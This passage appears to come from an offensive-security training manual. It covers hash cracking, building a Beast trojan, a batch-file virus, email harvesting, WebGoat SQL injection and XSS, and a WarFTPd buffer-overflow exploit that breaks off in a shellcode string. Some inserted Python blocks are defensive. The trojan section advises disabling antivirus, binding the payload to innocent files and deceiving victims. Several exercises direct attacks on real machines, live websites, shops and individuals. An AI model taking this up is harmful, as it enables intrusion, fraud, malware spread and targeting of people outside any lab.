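# gets in; 10.0.0.9 is a user who mistyped once and then logged in normally.
SAMPLE_LOG = """\
Mar  9 16:56:30 lab sshd[2101]: Failed password for root from 10.0.0.5 port 50001 ssh2
Mar  9 16:56:30 lab sshd[2102]: Failed password for root from 10.0.0.5 port 50002 ssh2
Mar  9 16:56:31 lab sshd[2103]: Failed password for invalid user admin from 10.0.0.5 port 50003 ssh2
Mar  9 16:56:31 lab sshd[2104]: Failed password for invalid user test from 10.0.0.5 port 50004 ssh2
Mar  9 16:56:32 lab sshd[2105]: Failed password for invalid user guest from 10.0.0.5 port 50005 ssh2
Mar  9 16:56:32 lab sshd[2106]: Failed password for root from 10.0.0.5 port 50006 ssh2
Mar  9 16:56:40 lab sshd[2110]: Failed password for alice from 10.0.0.9 port 40001 ssh2
Mar  9 16:56:45 lab sshd[2111]: Accepted password for alice from 10.0.0.9 port 40001 ssh2
Mar  9 16:57:10 lab sshd[2120]: Failed password for root from 10.0.0.5 port 50007 ssh2
Mar  9 16:57:12 lab sshd[2121]: Accepted password for root from 10.0.0.5 port 50008 ssh2
"""

AUTH = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_auth(text, year=2013):
    """Yield (timestamp, succeeded, source_ip, user) for each password auth line.
    syslog lines carry no year, so the caller supplies it."""
    for line in text.splitlines():
        m = AUTH.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            yield ts, m.group("result") == "Accepted", m.group("ip"), m.group("user")


def detect_bruteforce(text, threshold=5, window_seconds=60, year=2013):
    """Sliding window per source IP: alert once `threshold` failures fall within
    `window_seconds`, and again if a login from that source then succeeds."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, user) failures in window
    alerted = set()
    alerts = []
    for ts, ok, ip, user in parse_auth(text, year):
        q = recent[ip]
        while q and (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()               # expire failures older than the window
        when = ts.strftime("%b %d %H:%M:%S")
        if ok:
            if len(q) >= threshold:
                alerts.append("%s: login for %s from %s succeeded after %d failures (likely cracked)"
                              % (when, user, ip, len(q)))
            continue
        q.append((ts, user))
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)           # one alert per source, not one per attempt
            users = sorted({u for _, u in q})
            alerts.append("%s: %d failed logins from %s within %ds (%d usernames: %s)"
                          % (when, len(q), ip, window_seconds, len(users), ", ".join(users)))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The threshold and window are the knobs to tune against a real baseline; the same two signals (failure rate per source, then a success from a source that was failing) are what tools such as fail2ban act on, and the "succeeded after N failures" case is the one worth paging on.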

Using L0phtCrack to crack the hashes:

L0phtCrack is a password audit and recovery tool for Windows and Unix passwords.

L0phtCrack 6 provides two critical capabilities to system administrators:

● L0phtCrack 6 helps administrators secure Windows and Unix-authenticated networks through

comprehensive auditing of Windows NT/2000/XP/2003/Vista/2008 and Unix user account

passwords.

● L0phtCrack 6 recovers Windows and Unix user account passwords to streamline migration of

users to another authentication system or to access accounts whose passwords are lost.


Importing a hash into L0phtCrack:

Step 1: Click on Import Hash, then select Import from PWDUMP file.

Step 2: Select your hash file and click ok.

Step 3: Click on Begin.


As you can see, L0phtCrack has cracked the hashes for us.

Exercises:

i. Crack the Windows passwords by copying the SAM and SYSTEM files to a temporary location and use "Cain and Abel" to crack the passwords.

ii. Learn to use the John the Ripper password cracking tool.

iii. Crack the hash "28d2464b121f120a41f4cd5c496cae2c" (use all three types of password cracking and document the cracking procedure).

Module Seven: Malwares, Rootkits and Trojans

Objectives:

● To build a trojan using a trojan kit (Beast 2.07).

● To create a batch file virus.

Tools


● Beast (v2.07): This is a trojan building kit which is used to create trojans using a GUI.

● Notepad

● BAT to EXE converter

Beast

This is a powerful trojan building tool. It can be obtained from https://sites.google.com/site/trojandownloads/beast-2-07. However, this link was only functional at the time of writing, and you may need to look for another link.

Note: Your anti-virus program may flag this as a severe threat, as the trojan kit itself was released a couple of years back. To perform this demo successfully, you might have to disable your AV's protection mechanism.

Trojan

A trojan is a form of malware which acts as a 'remote administration tool'. Upon execution, the server can establish a link with the client (victim). Although this demonstration is carried out using Beast, in a real-world scenario other trojan kits might be more effective. The attacker must once again keep in mind that the concept behind the attack is what matters, and should perhaps look to create his/her own trojan kit.

Building a Trojan using Beast

● Launch the Beast GUI.

● Click on Build Server. This is the settings page of the file which will be executed on the victim's machine.

● In the Basic tab, specify the network settings for the file. The file will be referred to as 'server.exe'. Here you can also specify the program into which the trojan is to be injected. You can also create a password which will be required to connect to 'server.exe' when it is executed on the victim's computer.


● The Notifications tab provides options for 'server.exe' to inform the attacker about its current status. The medium of communication could be email, ICQ, etc.

● The Startup tab is self-explanatory and provides configuration options for the startup event of 'server.exe'.

● The AV-FW Kill page provides settings for the disabling of Anti-virus software and Firewall. It

provides options for specific firewalls/AVs. Apart from this, there are also options for the


periodic killing of AVs/firewalls and the disabling of Windows XP firewall.

● Click on Misc. Most of the functions are self-explanatory. However, of particular note are:

○ Melt server on Install - This deletes 'server.exe'. However, the trojan is injected into various other files and programs, ensuring its proper functioning.

○ Enable keylogger - The keylogger logs all keystrokes and user activity. It can be used to monitor all user activity.

○ Delay execution - This is used to delay execution of the trojan, so as to avoid the suspicion of the user.


● Click on Exe Icon to specify the icon of 'server.exe'.

● You should now see 'server.exe' in the directory where you have installed Beast. Go back to the main window of Beast and click on Binder to bind 'server.exe' with another inconspicuous file, such as a game, greeting, etc. This is where the attacker's social engineering skills come into play.

● The final file should be renamed accordingly and sent to the victim's computer. Once again, this will require social engineering on the part of the attacker.

Connecting to the victim’s computer

● Launch Beast. Specify the connection parameters and click on Connect to connect to the victim's machine.


● Once you specify the connection parameters

● Click on Managers. Here you can explore the Registry, File system, applications running and

active processes.


The features available are the same as those you would have when operating your own computer.

● Click on Windows and you can choose to Shut Down, Restart, Log Off, Crash the system, etc.

● Click on Lamer Stuff. All the options are self-explanatory and are mostly used to create a nuisance for the victim.

● Click on Fun Stuff. Once again, the options are self-explanatory. Chat is used to pop up a chat window on the victim's computer for a real-time conversation between the attacker and the victim.


● Click on Server. Click on Update Server, here you can update the server remotely. Apart from

this, you can also kill the server.

● Click on Misc. Here you can change the system time, send messages to the victim's desktop, get the log of the keylogger, etc.


● Following is a sample of the decrypted log given by the logger:

************ Boot:[09/03/2013]-[16:56:32]

[Beast2.07]-[16:56:32]

[Beast 2.07]-[16:56:33]

r

[Run]-[16:56:44]

abcdedffaasdsadarun

[Program Manager]-[16:56:50]

[Beast 2.07]-[16:56:51]

[Information]-[16:56:53]

asdasfaf

[Decrypt Log File]-[16:57:02]

************ Boot:[09/03/2013]-[17:27:02]

[Beast2.07]-[17:27:02]

[Program Manager]-[17:27:03]

[Beast 2.07]-[17:27:04]

[Run]-[17:27:23]

[Program Manager]-[17:27:54]

[Paint]-[17:27:54]

[Untitled - Paint]-[17:27:54]

vs

[Save As]-[17:27:56]

7

[Untitled - Paint]-[17:27:59]

[7.png - Paint]-[17:27:59]

[Beast 2.07]-[17:28:03]

r

[Run]-[17:28:09]

[Program Manager]-[17:28:09]

[Paint]-[17:28:09]


[Untitled - Paint]-[17:28:09]

vs

[Save As]-[17:28:11]

8

[Untitled - Paint]-[17:28:14]

[8.png - Paint]-[17:28:14]

[Settings]-[17:28:19]

[Beast 2.07]-[17:28:24]

Batch File Viruses

Viruses are malware which can replicate themselves and spread from one computer to another. It is a common misconception that viruses also include trojans, botnets, adware, etc.; this is untrue, and is in fact the definition of malware. One should note that every virus is malware, but the converse need not be true.

We will now try to create a simple batch file virus of our own. Such viruses will generally not be detected by AVs, as they are simple code. However, they can be read easily by the user. To avoid this, you can download a 'BAT to EXE' converter online. The one used in this tutorial is available at http://www.battoexeconverter.com/. Any other converter will also do.

Note: While playing with a batch virus you might cause irreversible damage to your machine, to the extent that you might have to format your system. Hence it is best to carry this out on a virtual machine.

Note: While these viruses might seem to be only potential nuisance makers, they can be written effectively enough to bring down an entire machine.

● Open Notepad.

● Write the following code:

1 @echo off

2 :x

3 start notepad

4 start explorer

5 start control

6 goto x

Line 1 prevents the commands from being displayed on the screen. Line 2 is a label; we will come to its use in just a moment. Lines 3-5 launch Notepad, Explorer and Control Panel. Line 6 makes the program go back to Line 2 (with the help of the infamous goto statement and the label 'x'), causing repeated execution of Lines 3-5. Thus a large number of Notepad, Explorer and Control Panel windows are launched. This might cause the system to crash.

● Save the file as 'batchvirus.bat'.


● Now, to convert it to an EXE file, open 'Advanced BAT to EXE converter'.

● Click on Open and select the BAT file we just created.


● Click on Build EXE and select Start Invisible.

● Select the file path to save the EXE to.

● Sure enough, we have our own batch file Virus.

There are a number of ways to develop batch viruses; it is only bounded by your creativity. However, it might be a challenge to use batch viruses to actually infect other files.


theHarvester.py

theHarvester.py is an information gathering tool used to list email addresses and other information from public sources. It is part of the BackTrack distribution. This particular demonstration uses BackTrack 5. To perform it, follow these steps:

● Launch BackTrack5. Go to /pentest/enumeration/theharvester. This is where

theHarvester.py is located.

● Launch terminal. Type in the following:

root@bt:~# cd /pentest/enumeration/theharvester

● Now that we are inside the directory, we need to launch the script. To do so, type in the following:

root@bt:~# ./theHarvester.py

● We will now try to use this tool to gain information about harvard.edu

● The next command to be entered is:

root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d harvard.edu -b google

Here '-d' is used to specify the domain name to search for and '-b' is used to specify the data source to use (Google, Bing, etc.).


● The command lists all the email addresses it can find. Upon scrolling down, we can also see the various hosts found.


The information obtained using theHarvester.py is of vital importance from a social engineering perspective. Gaining email addresses helps us pinpoint people efficiently, which is of course a huge help when employing social engineering tactics.

Exercises

1. Using a Trojan building kit, other than Beast, build a Trojan and successfully infect a

victim machine.

2. Without the use of any Trojan building kit, using only programming skills, try to create a

program which can act as a RAT. It need not pack all the features demonstrated, but

should be able to carry out basic functions.

3. Read more about batch file programming and use it to build a batch file virus which can

permanently crash the machine.

4. Using theHarvester.py, find out the email addresses associated with a random server

and use them to pinpoint a particular person.


Module Eight: Getting Offensive

Common Web Application Attacks

Objective

● To carry out common web application attacks, including SQL injection, XSS and Basic Access

Flaws.

● To use google dorks for information gathering.

Tools

● WebGoat - This is a controlled environment used for practising and learning about web application attacks. The purpose of WebGoat is to provide hands-on experience in carrying out attacks.

● TamperData - Firefox plugin used to intercept HTTP requests.

● Live HTTP Headers - Firefox plugin used to read HTTP headers.

Netcraft

http://news.netcraft.com/ is a service which can be used to gather information about websites. The IP address, the OS running on the server, the hosting country, the risk rating, etc. are often quite useful in narrowing down the type of attacks to be carried out on the given site during a pentest.

A typical site report looks as follows.


Configuring WebGoat

WebGoat is available for download from http://code.google.com/p/webgoat/downloads/list. The download includes instructions on setting up the application (README.txt). As it contains a bundle including Apache Tomcat, the JRE and the application itself, it is self-sufficient. If you get to the following screen successfully, it means that you are running WebGoat successfully.

Note: While using WebGoat, disconnect from the network, as the application also makes the network vulnerable to attacks.

SQL Injection

SQL injection is an attack which manipulates the SQL command sent to the server so as to obtain data from the database, generally by way of the input supplied by the attacker.

SQL Injection on WebGoat

● Go to Injection Flaws > Stage 1: String SQL Injection


● In the password field, try putting in a random username, e.g. 'Sam'.

As expected, we are unable to log into the system.

Note: A real website will definitely not have its SQL commands up for display, so try to work without it.

Whatever input the attacker gives is delimited by quotes in almost all cases. The idea here is to manipulate this syntax so as to gain user access without having valid credentials.

Before doing this, install the TamperData add-on for Firefox.

Using Tamperdata

After installing,

● In your Firefox window, go to Tools > TamperData.

● Go to the TamperData window and click on Start Tamper.

● Put in any random password, e.g. "Pass123", in the password field. Click on the Login button.

TamperData should show the following screen.


● Click on Tamper. This allows you to intercept the POST request and change the password value that is sent to the server.


● The string ' or 1=1-- modifies the (probable) SQL command as follows:

select * from users where user='Larry' and pass='xyz';

to

select * from users where user='Larry' and pass='' or 1=1--';

The second statement adds a condition (1=1) which is always true, so the query returns all the users in the database, and by default the application logs in the first user in the table.
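The two statements above can be reproduced offline. The following Python is an added example, not code from the manual or from WebGoat: it runs the manual's ' or 1=1-- input against an in-memory SQLite table holding three constructed users, once through a string-built query of the shape shown above and once through a parameterised query, which is the fix an application should use.

```python
import sqlite3

# Constructed sample table standing in for WebGoat's users table
USERS = [("Larry", "larrysecret"), ("Sam", "sampass"), ("Dave", "davepass")]


def make_db():
    """In-memory SQLite database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (user text, pass text)")
    conn.executemany("insert into users values (?, ?)", USERS)
    return conn


def login_vulnerable(conn, user, password):
    """The query shape the manual shows: user input spliced straight into the SQL.
    Returns the matching usernames; an application like this logs in the first one."""
    sql = "select user from users where user='%s' and pass='%s'" % (user, password)
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, user, password):
    """The same query with bound parameters: the input is treated as data, so
    quotes and comment markers inside it never change the statement's structure."""
    sql = "select user from users where user=? and pass=?"
    return [row[0] for row in conn.execute(sql, (user, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("string-built query :", login_vulnerable(db, "Larry", payload))  # every user
    print("parameterised query:", login_safe(db, "Larry", payload))        # nobody
```

With the string-built query the condition becomes (user='Larry' and pass='') or 1=1, which matches every row; with bound parameters the whole payload is compared against the pass column as a literal and nothing matches.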


● The above page shows that we have successfully carried out the attack, giving us access to the user's account.

Havij


Havij is an automated SQL injection tool for pen testers. It can be used to greatly simplify the process.


It also allows direct access to the database: all the tables are listed out with complete access.

The target URL should be the address of the page along with a marker (%inject_here%) after the parameter which is to be used for manipulation.

Handy Tricks

● SQL syntax may vary from web application to web application, so try different combinations to gain access.

● Do NOT memorise ' or 1=1-- as a keyword. Understand how the mechanism works in order to exploit it.


● At times, input validation on the front end might not allow you to enter special characters. In such cases it is best to use TamperData or Burp to intercept the HTTP requests.

● Although tools such as Havij can be used to compromise security easily, one should be careful not to use them as a script kiddie's tool.

Cross Site Scripting

Stored XSS

The injection/storage of a malicious script in a web application such that it is executed by the client's browser is called an XSS attack. The following is an example of a Stored XSS attack using WebGoat.

● Launch WebGoat and go to Cross Site Scripting (XSS) > Stored XSS Attacks

● Put in a random title and, in the Message field, enter the script to be executed. Although the script used here is pretty straightforward, one can replace it with a malicious script.

● Click on Submit to save the message to the Message List.

● The newly stored message should appear on the Message List.


● Clicking on it should yield the following result.

The appearance of the alert confirms the successful execution of the script and the attack.

Reflected XSS

In this attack, the attacker usually creates a URL which contains the attack script and mails it, or uses other media, to get the user to access it, thereby compromising the user's security.

● Launch WebGoat, go to Cross Site Scripting > Reflected XSS

● The field we will exploit is the access code field.

● In the access code field, after the three-digit code, put in the following code:

<script>alert('Reflected XSS')</script>


● Click on Purchase. This should display the alert.

● Hence, we have successfully executed the Reflected XSS attack.
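Both lessons come down to the same two defects: the application writes untrusted input into the page without encoding it, and it echoes input it never validated. The following Python is an added illustration, not taken from the manual or from WebGoat, that models the defensive side: a message-list renderer with and without output encoding (the stored case) and an access-code page with and without validation (the reflected case). The page markup and the three-digit code format are assumptions made for the example.

```python
import html
import re

# The test script the manual enters into WebGoat (constructed sample input here)
PAYLOAD = "<script>alert('Reflected XSS')</script>"


def render_message_unsafe(title, message):
    """Stored XSS: the saved message is written into the page as raw HTML."""
    return "<h3>%s</h3><p>%s</p>" % (title, message)


def render_message_safe(title, message):
    """Same page with output encoding: '<', '>', '&' and quotes become entities,
    so the browser displays the script text instead of executing it."""
    return "<h3>%s</h3><p>%s</p>" % (html.escape(title), html.escape(message))


def reflect_unsafe(access_code):
    """Reflected XSS: the submitted access code is echoed back unmodified."""
    return "<p>Invalid access code: %s</p>" % access_code


def reflect_safe(access_code):
    """Validate the input against what the field is for (an assumed three-digit
    code), never echo anything that fails validation, and encode what is echoed."""
    if not re.fullmatch(r"\d{3}", access_code):
        return "<p>Invalid access code</p>"
    return "<p>Access code %s accepted</p>" % html.escape(access_code)


def executes_script(rendered):
    """Crude check for the demo: does a raw <script> tag survive into the output?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_message_unsafe("hello", PAYLOAD))
    print(render_message_safe("hello", PAYLOAD))
    print(reflect_unsafe("123" + PAYLOAD))
    print(reflect_safe("123" + PAYLOAD))
```

Output encoding is the control that matters for the stored case, because the message is legitimately free text; validation alone fixes the reflected case here only because the field has a strict expected format.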

Handy Tricks

● When working on live websites, check fields such as search boxes for Reflected XSS.

● Many forums and message boards are still vulnerable to Stored XSS.

● Use Google Dorks to look for the message board list in specific websites.

Basic Authentication Flaws

Web applications often have improper mechanisms in place to retrieve or process forgotten passwords. The attacker looks to exploit this weakness in order to gain access.

Forgot Password

This vulnerability is present when the security question protecting the password is not as strong as the password itself.

● Launch WebGoat. Go to Authentication Flaws > Forgot Password.

● Enter the username as 'webgoat' in the username field.

● The security answer should be pretty obvious. Try a couple of colours, such as 'blue', 'green', etc.

● Finally, 'red' will get us through.


Note: Although this vulnerability involves more social engineering than actual exploitation of a flaw in the system, it is still effective and can still be used to bypass the authentication of major mail sites.

Basic Authentication Flaw

Basic Access Authentication is used by the web browser to provide the username/password when making a request to the server. This information is Base64-encoded and sent to the server in the HTTP Authorization header. When the request is received, the header is read and the encoded value is decoded to get the user credentials.

● Launch WebGoat, go to Authentication Flaws > Basic Authentication.

● Open Live HTTP Headers (ensure that the Capture box is ticked) and refresh the Basic Authentication page.

● The highlighted entry is the authentication header along with the encoded value of the user credentials.

● Copy only 'Authorization' to the WebGoat Authentication Header Name field.

● Now we need to decode the base64-encoded value so as to get the username/password out of it.


● Go to http://yehg.net/encoding/index.php and paste the base64-encoded string in the textbox given.

● Click on 'Convert me!' to get the decoded value.

● There is the required username/password. Copy this string to the second textbox on the WebGoat Basic Authentication Flaw page.

● Click on Submit. You will now get a page saying that the vulnerability has been exploited successfully.

● Now we will try to log in using the 'basic:basic' credentials given on the congratulatory page.

● Clear your browser's cookies and active login sessions.

● In the URL field, put in the following URL:


http://basic:basic@localhost:8080/WebGoat/attack?Screen=187&menu=500&Restart=187

● Click on Submit; we should now see the following dialog box.

● Upon clicking 'OK' you will be logged into the website successfully.

● Hence we have successfully exploited the Basic Access Authentication flaw.
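The decoding step above does not need the online converter, and doing it locally makes the point of the lesson concrete: Base64 is an encoding, not encryption, so the credentials are readable by anyone who sees the header. The following Python is added here and is not part of the manual or of WebGoat: it picks the Authorization header out of a constructed request capture laid out the way Live HTTP Headers shows it, decodes the value back to basic:basic, and rebuilds the header from the credentials. The request line and Host header in the sample are invented for the example.

```python
import base64

# Constructed capture in the form Live HTTP Headers displays it (not a real capture)
SAMPLE_REQUEST = (
    "GET /WebGoat/attack?Screen=187&menu=500 HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    "Authorization: Basic YmFzaWM6YmFzaWM=\r\n"
    "\r\n"
)


def find_authorization(raw_request):
    """Return the value of the Authorization header from a captured request, or None."""
    for line in raw_request.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "authorization":
            return value.strip()
    return None


def decode_basic_auth(header_value):
    """Reverse what the browser did: 'Basic <base64(user:pass)>' -> (user, pass).
    No key is involved, so any party that can read the header can do this."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        raise ValueError("not a Basic authentication header")
    credentials = base64.b64decode(token).decode("utf-8")
    user, _, password = credentials.partition(":")  # the username may not contain ':'
    return user, password


def encode_basic_auth(user, password):
    """What the browser sends once it knows the credentials."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode("utf-8")).decode("ascii")
    return "Basic " + token


if __name__ == "__main__":
    header = find_authorization(SAMPLE_REQUEST)
    print("captured header :", header)
    print("decoded         :", decode_basic_auth(header))
    print("re-encoded      :", encode_basic_auth("basic", "basic"))
```

The only thing that keeps these credentials private on a real site is the transport, which is why Basic authentication should only ever be used over HTTPS.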

Google Dorks

Google dorks are advanced searching techniques using Google. They are used to narrow down on specific content on the web, or even within a particular website. For example, while checking a website for SQL Injection one will of course want to look at the login page. However, searching for this particular page manually will take some effort and may also turn out to be cumbersome. Hence, one can employ Google Dorks to search for the probable login pages in the site.

Typical Google Dork syntax:

dork1:parameter1 dork2:parameter2 query

Common Google Dorks

● cache: This is used to search cached pages for the given search query.

● link: It returns all the pages containing a link to the given parameter. For example, link:www.nsd.org.in will return all the pages containing links to the given URL.

● related: This is used to display pages similar to the one specified.

● info: It will return whatever information Google has about the given site. There should be no space between the dork and the parameter.

● inurl: This will return all the pages containing the query word immediately after the dork in the URL of the page. For example, [inurl:nsd isac] will return all the pages which contain 'nsd' in the URL and 'isac' anywhere in the document.

● allinurl: This will return all the pages containing all the query words after the dork in the URL of the page. For example, [allinurl:nsd isac] will return all the pages which contain both 'nsd' and 'isac' in the URL.

● intitle: This will return all the pages containing the query word immediately after the dork in the title of the page. For example, [intitle:nsd isac] will return all the pages which contain 'nsd' in the title and 'isac' anywhere in the document.

● allintitle: This will return all the pages containing all the query words after the dork in the title of the page. For example, [allintitle:nsd isac] will return all the pages which contain both 'nsd' and 'isac' in the title.

● site: This is used to restrict the results to a given domain.

Google Dorks can be combined to look for results more specifically. For example, the following search query can be used to search for the login page of a particular website, so that it can be checked for SQL Injection.

inurl:login site:silverzone.org


Exercises

i. Using Google Dorks, search for a website which contains a login page and try to execute SQL Injection on it.

ii. Read about the Shopping Cart Attack and try to carry it out on an e-commerce website using TamperData/Burp Suite.

a. Hint: The Shopping Cart Attack involves interception of HTTP requests (demonstrated in the SQL Injection part) so as to change the value of the bill and obtain items at a lower price.

iii. Complete the XSS challenge in WebGoat.

Module Nine: Exploiting

Buffer Overflows:

Objectives: At the end of this module you should be able:

● To perform buffer overflows in a program.

● To understand and exploit programs.

● To understand and use debuggers effectively.

● To attack and get control of a system.

Description:

Buffer overflows are a special type of technique where we bombard the program with large amounts of random data, which causes the program to fail at a certain point.

We attach a debugger to catch the exception points, errors and overflowing areas, and critical events such as EIP being overwritten.

For this example we will be using the WarFTPd 1.6 FTP server on Windows XP.

WarFTPd:


i. Notice the little lightning icon up there?

ii. Click that to start the FTP server. (Remember that the FTP server listens on port 21.)

iii. You can connect to the FTP server with the telnet or nc command:

# nc <target.ip> 21

After connecting, you can type the "USER" command to give the username and the "PASS" command to provide the password.

Here I have entered more than 20 '!' characters, but it was not enough to crash the server; let's try with more characters.

The above step may be repeated until you crash the server or observe EIP being overwritten in the debugger.


For this we can use a simple FTP login script to log into the FTP server easily:

use strict;
use Net::FTP;

my $host     = "server.IP";      # address of the machine running WarFTPd
my $user     = "user";
my $password = "password";

my $f = Net::FTP->new($host) or die "Can't open $host\n";
$f->login($user, $password) or die "Can't log $user in\n";

Write and save the above code as <Somename>.pl and execute it:

# perl <Somename>.pl

The next step is to generate a large string for the USER and PASS input; let's use Perl to generate it for us:

# perl -e 'print "A" x 1000'

Now copy all the A's and paste them in place of the username and password in the above script.

Run the script and see if the application crashes.

If the program is not responding or closed automatically, it means it crashed!

If you have not attached the debugger already, do it now, and repeat the above step of executing the Perl script with the long string of A's.


Attaching the debugger:

Using OllyDbg

OllyDbg is one of the best ring 3 debuggers for Windows applications and is the one used in this demonstration.

To attach a process click File -> Attach, select the <Process name> and click on Attach.

Once the process is attached, run our Perl script again and observe OllyDbg showing the program crash.

The program crashes again, and the debugger shows a message saying "Access violation while executing 41414141". What it means is that we have tried to go to address 41414141 to execute code; since this is not a valid address, the system cannot proceed and all execution halts.


Observe which registers are overwritten.

Observe the upper right block of OllyDbg, which shows the CPU register values.

The values of ESP, EBP, EDI and EIP are showing 41414141, which is nothing but our character 'A' shown as its ASCII value (0x41).

This is our proof of concept that the value of EIP can be overwritten, which gives us control to jump to other places in memory.

If we can plant shellcode somewhere in memory, then we can use this EIP to point to the starting address of our shellcode.

Writing the exploit:

To write the exploit we need to know some details accurately.

Let's see what we already know:

• We already know that the program crashes when we send 1000 A's.

• EIP is successfully overwritten with A's.

What we need to know:

• We need to know exactly at which byte EIP is being overwritten. (Without knowing it, we can't write our exploit, as we will not know where to place the address of our shellcode in the exploit.)

• We need to know exactly how many bytes we have after EIP that ESP points to. (This is required as our shellcode will start from the address ESP points to, and our shellcode cannot exceed this size.)

Finding the exact byte:

To find the exact byte, we can use a trial and error method by narrowing the boundaries of our variables, i.e. instead of 1000 A's we send 500 'A's and 500 'B's.

In the next round we would narrow it further by sending 400 'A's and 400 'B's, and so on.


The other, easier method is to generate a unique string, send it across, observe it in OllyDbg and find the exact byte at which the 4 characters in EIP appear in the unique string.

In this case we have a program in BackTrack to generate the string and locate the exact byte number.

This tool is part of the Metasploit tools and is available in /opt/metasploit/msf3/tools/

Use pattern_create.rb to generate the unique string.

pattern_create.rb usage:

# ./pattern_create.rb 1000 (will create 1000 unique characters)

# ./pattern_create.rb 1000 A B C (creates 1000 characters using the sets "A", "B" and "C")

Replace the 1000 A's with the newly generated unique string in the Perl FTP login script.

Before executing the script, remember to restart the program in Windows XP.

Once the script is executed and the program crashes, observe the value of EIP in OllyDbg.

The value here is "32714131". To find the exact byte we use the program pattern_offset.rb, which is in the same folder as pattern_create.rb.

pattern_offset.rb usage:

# ./pattern_offset.rb "unique value"


So, the exact offset where EIP gets overwritten is 485.

Finding the buffer space:

We have now found the exact byte at which EIP is overwritten. The next step is to find the amount of buffer space available on the stack for executing our shellcode.

In OllyDbg, look for the unique string at ESP (this points to where the stack resides, i.e. where our shellcode will be residing).

The marked letters (q4Aq5Aq6) are the bytes for which we need to find the offset, to know the exact byte where the stack starts.

We use the same pattern_offset.rb to find this offset too.

Let's check whether the buffer really starts at byte 493.

To check, let's modify our Perl command:

# perl -e 'print "A" x 485 . "BBBB" . "C" x 4 . "STAR" . "D" x 100'

This will generate a string that identifies the exact bytes of EIP and ESP.

Copy the generated string, place it in the username and password variables of our Perl script and execute it after restarting the program in Windows XP.


This shows that EIP is indeed at 485 bytes, since it is overwritten by 42 (ASCII character B), and ESP is overwritten by "STAR", which starts at 493.

Look at the stack dump and count the number of bytes overwritten by the letter "D" (ASCII 0x44) until it hits the SEH record.

That gives us 72 bytes of free space on the stack where our shellcode can go.
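The unique-string method and the A/BBBB/CCCC/STAR/D probe above can both be reproduced in Python, which is useful when triaging a crash without the Metasploit tools to hand. The following is an added example, not the Metasploit scripts themselves: pattern_create builds the same Aa0Aa1Aa2... sequence that pattern_create.rb produces for its default character sets, pattern_offset locates either the little-endian register value the debugger displays (the manual's 32714131) or a literal fragment (q4Aq5Aq6), and build_probe/probe_layout confirm that the probe places BBBB at 485 and STAR at 493. The values are the manual's; everything else is constructed for the example.

```python
import string

# The three character sets pattern_create.rb cycles through by default
SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length):
    """Cyclic string 'Aa0Aa1Aa2...' cut to `length` characters; every 4-byte
    window is unique, so a register value maps back to exactly one offset."""
    chunks = []
    for upper in SETS[0]:
        for lower in SETS[1]:
            for digit in SETS[2]:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, value):
    """Offset of `value` in the pattern, or -1. `value` is either the 8 hex digits
    the debugger shows for a register (read as a little-endian dword, as
    pattern_offset.rb does) or a literal fragment of the string."""
    is_hex = len(value) == 8 and all(c in string.hexdigits for c in value)
    needle = bytes.fromhex(value)[::-1].decode("latin-1") if is_hex else value
    return pattern.find(needle)


def build_probe(eip_offset, marker="STAR", tail=100):
    """The manual's second probe: "A" x 485 . "BBBB" . "C" x 4 . "STAR" . "D" x 100."""
    return "A" * eip_offset + "BBBB" + "CCCC" + marker + "D" * tail


def probe_layout(probe, marker="STAR"):
    """Where the EIP filler and the ESP marker sit inside the probe."""
    return {"eip": probe.find("BBBB"), "esp": probe.find(marker)}


if __name__ == "__main__":
    pattern = pattern_create(1000)
    print("EIP 32714131 ->", pattern_offset(pattern, "32714131"))   # 485
    print("ESP q4Aq5Aq6 ->", pattern_offset(pattern, "q4Aq5Aq6"))   # 493
    print("probe layout  ->", probe_layout(build_probe(485)))
```

Reading the register value little-endian is the step people most often get wrong: 0x32714131 sits in memory as the bytes 31 41 71 32, i.e. the text "1Aq2", and that is the substring to search for.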

Finding a JMP ESP instruction:

We need to find a JMP ESP instruction because we cannot hardcode a stack address and tell our code to jump directly to our shellcode. Since we can be sure that ESP points to the start of our buffer, we overwrite EIP with the address of a JMP ESP instruction; once executed, it jumps directly to our stack, where our shellcode resides, and starts executing it.

There are various tools to find a JMP ESP instruction in a library.

We will use OllyDbg to find the instruction.

Let's look at the libraries used by the warftp program in OllyDbg. (Click on the icon to show the list of libraries used by the program.)


In any exploit you write, try to find the JMP or other instructions you need in a library that you are sure is loaded while the program executes, i.e. some programs may have optional libraries that are not loaded all the time.

Here we choose to find the instruction in SHELL32.dll, since it is always loaded for a program that needs to be executed.

Click on shell32.dll and look for the instruction JMP ESP. (To find an instruction use Ctrl + F, which opens the find box; enter the instruction you want to find and click on Find.)

We have found the JMP ESP instruction at "7C9D30D7".

This is the address we want to place in EIP.

Now we have got all that we need; the next step is to find shellcode that we can place on our stack.

For the shellcode, we will search exploit-db to get it. You can write your own shellcode and put it in, or search other websites of your interest to get the shellcode.

In this example, since we have a limit of 72 bytes, we will look for shellcode that is less than 72 bytes.


Exploit-db gave us some results for "Windows XP".

We can see that there are different shellcodes with different sizes; we will choose the Windows XP SP3 cmd.exe one (26 bytes), since this machine is SP3 and we have no more than 72 bytes.

This is the cmd.exe shellcode which, when run inside our warftpd, launches a command prompt:

"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x2F\x68\x63\x6d\x64\x2e".
